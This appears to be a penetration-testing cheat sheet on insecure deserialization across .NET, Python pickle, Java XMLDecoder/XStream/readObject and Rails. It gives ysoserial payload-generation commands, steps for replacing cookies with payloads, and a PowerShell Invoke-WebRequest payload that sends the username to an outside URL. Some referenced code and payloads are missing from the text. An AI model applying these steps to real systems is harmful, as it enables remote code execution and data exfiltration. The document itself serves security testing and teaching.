Insecure Deserialization
Theory
Serialization is a means of translating data from one form to another.
Used for storage or transmission of data across the network.
All languages have support for serialization:
Java
PHP
.NET
COM
Ruby
Python
All other OOP based languages.
.NET
Top Serialization Methods
Binary Serialization - Runtime serialization
XML & SOAP Serialization
Data Contract Serialization
Binary Serialization
The .NET Framework provides the BinaryFormatter class for binary serialization.
Most common in .NET serialization.
BinaryFormatter is a fast, light-weight binary serialization technique.
BinaryFormatter Class serializes and deserializes an object or an entire graph of connected objects, in binary format.
System.Runtime.Serialization.Binary.BinaryFormatter class is a serialization mechanism in the framework since version 1.0
Methodology in Identifying Vulnerability
Identify if a block of data contains .NET Binary Serialized Data.
Focus on identifying this string as Initial Signature 'AAEAAAD//////' within the application. Eg: Login pages.
Exploitation
Tool: ysoserial.net
It takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
To crack the above example: Gadget:
TypeConfuseDelegate
, Formatter:BinaryFormatter
Generate a payload using ysoserial and replace in request to server.
Payload for Code Exection:
powershell.exe Invoke-WebRequest -URI http://<URL>/$env:UserName
Python Pickle Code Injection
Pickle is a library in python to serialize and deserialize data.
It allows the developer to get a string from an object and an object from a string.
Vulnerability arises when the user has control over the object which is deserialized.
Serialization of object is used by application to make their storage easier. If an application needs to store an instance of a class, it can use serialisation to get a string representation of this object. When the application needs to use the instance again, it will unserialise the string to get it.
Gain code execution if you have control over a string that is unserialised using Pickle
Identify
Base64 decode all Cookie values. Enable all functionality[Eg:Rememberme at Login]
Look for something similar to the code below.
Generate Exploit
Execute and encode output to Base64.
python Pickle.py
Online python compiler :
https://www.tutorialspoint.com/execute_python_online.php
Replace Cookie with Exploit
You may need to delete other cookes( for example, if Rememberme Cookie is vulnerable)
Reload page, code gets executed if vulnerable. [Even if response is HTTP 500]
XMLDecoder
XMLDecoder is a Java class that creates object based on a XML message. If a malicious user can get an application to use arbitrary data in a call to the method
readObject
, she will instantly gain code execution on the server.Gain code execution when an application uses XMLDecoder to parse XML and create an object from the XML message. Unserializing user-controlled data is never a good idea and should be avoided.
Exploitation
Identify in the responses for any usage of of XMLDecoder class.
Reference: Pentesterlab Excercise
In this excercise, the web app accepts and processes XML file.
Xstream vulnerability [Jenkins : CVE-2016-0792]
Xstream is a popular deserialization library. It’s used directly by many popular apps, like the build tool, Jenkins. By sending the below payload, Jenkins will unserialize the data provided and will allow an attacker to gain code execution. Reference: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream
The payload illustrated here relies on Groovy.
Tip
Change the parmeter
name=<change here for each request>
ObjectInput Stream using readObject ()
The root cause of this issue comes from the fact that the application uses the method readObject()
on data coming from the user. Get code execution if an application uses readObject()
and contain a "vulnerable" library.
Pr-requisites
Entry point: Call to the method readObject() using untrusted input.
Libraries that uses vulnerable gadgets. [ eg:Spring]
Exploitation
Tool: ysoserial
Burp Extension JavaSerialKiller.
Inspect the authenticated cookie starts with the below pattern. If similar, this is a good indicator that the application uses a base64 encoded Java serialization object,
Create a malicious serialized object using a payload and <command> with ysoserial. Try all the payloads if you're not sure of the right one.
java -jar ysoserial.jar Spring1 '<insert command>' | base64
Base64 encode the output and replace the cookie with this value and replay the request. Code is executed.
Rails Object Injection [CVE-2013-0156]
POC exploit: https://gist.github.com/postmodern/4499206
The idea here is to create a new action with arbitrary code in it. By default, Rails doesn't support pure YAML in a request body. But it supports XML that can embed YAML in it.
The parameter parsing code of Ruby on Rails allows applications to automatically cast values from strings to certain data types. Unfortunately the type casting code supported certain conversions which were not suitable for performing on user-provided data including creating Symbols and parsing YAML. These unsuitable conversions can be used by an attacker to compromise a Rails application.
Last updated